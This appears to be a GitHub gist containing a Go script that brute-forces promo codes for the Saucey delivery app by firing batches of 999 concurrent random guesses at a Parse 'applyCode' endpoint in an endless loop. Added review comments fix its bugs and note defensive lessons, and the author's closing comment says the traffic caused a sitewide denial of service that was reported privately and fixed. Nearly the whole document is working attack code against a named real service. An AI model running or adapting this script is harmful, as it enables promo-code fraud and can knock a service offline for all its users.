Bruteforce saucey promocodes
package main
import (
"bytes"
log "github.com/Sirupsen/logrus"
"io/ioutil"
"math/rand"
"net/http"
"sync"
"time"
)
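// req submits one randomly generated six-character promo code to the
// applyCode cloud function and logs the raw response body.
//
// The candidate is drawn from a 36-symbol lowercase alphanumeric alphabet
// (36^6, roughly 2.2e9 possible values) and embedded in a fixed JSON body.
// Every failure is logged and ends the call early. The original fell through
// to resp.Body after a failed Do, where resp is nil, and so panicked on any
// network error; it also never checked the error from http.NewRequest.
//
// NOTE(review): defensive takeaway. The author's comment on this gist says
// traffic of this kind exhausted a global API rate limit and took the whole
// site down. A redemption endpoint should count failed attempts per account
// or client rather than against a quota shared by every user, and codes
// should carry enough entropy that guessing is impractical.
func req() {
	const letterBytes = "abcdefghijklmnopqrstuvwxyz1234567890"
	b := make([]byte, 6)
	for i := range b {
		b[i] = letterBytes[rand.Intn(len(letterBytes))]
	}

	url := "https://api.parse.com/1/functions/applyCode"
	// b only ever holds characters from letterBytes, so the concatenation
	// cannot break out of the JSON string literal.
	jsonStr := []byte(`{"promoCode":"` + string(b) + `","_ApplicationId":"","_JavaScriptKey":"","_ClientVersion":"js1.3.4","_InstallationId":"","_SessionToken":""}`)

	// Named request rather than req so the local does not shadow this function.
	request, err := http.NewRequest("POST", url, bytes.NewBuffer(jsonStr))
	if err != nil {
		log.Error(err.Error())
		return
	}
	request.Header.Set("X-Custom-Header", "myvalue")
	request.Header.Set("Content-Type", "application/json")

	client := &http.Client{}
	resp, err := client.Do(request)
	if err != nil {
		// resp is nil here; returning avoids the nil dereference below.
		log.Error(err.Error())
		return
	}
	defer resp.Body.Close()

	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		log.Error(err.Error())
		return
	}
	log.Info(string(body))
}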
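// main loops forever, launching a batch of 999 concurrent req calls, waiting
// for the batch to finish, and then sleeping 60 seconds before the next one.
//
// wg.Add is called before each goroutine starts. The original called it
// inside the goroutine, which races with wg.Wait: Wait could return before
// some goroutines had registered, so the pause could begin while requests
// were still in flight.
//
// NOTE(review): for defenders, the visible pattern is a burst of applyCode
// calls from one client followed by a fixed quiet interval. Per the author's
// comment on this gist, the pause did not prevent the shared rate limit from
// being exhausted.
func main() {
	for {
		var wg sync.WaitGroup
		// try not to exceed parse.com api ratelimiting
		for i := 1; i < 1000; i++ {
			wg.Add(1)
			go func() {
				defer wg.Done()
				req()
			}()
		}
		wg.Wait()
		time.Sleep(60 * time.Second)
	}
}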

dan-compton commented Nov 12, 2015

Bruteforcing sauceyapp promocodes caused a sitewide DoS due to global API rate limiting. This issue was reported privately and fixed a while back.
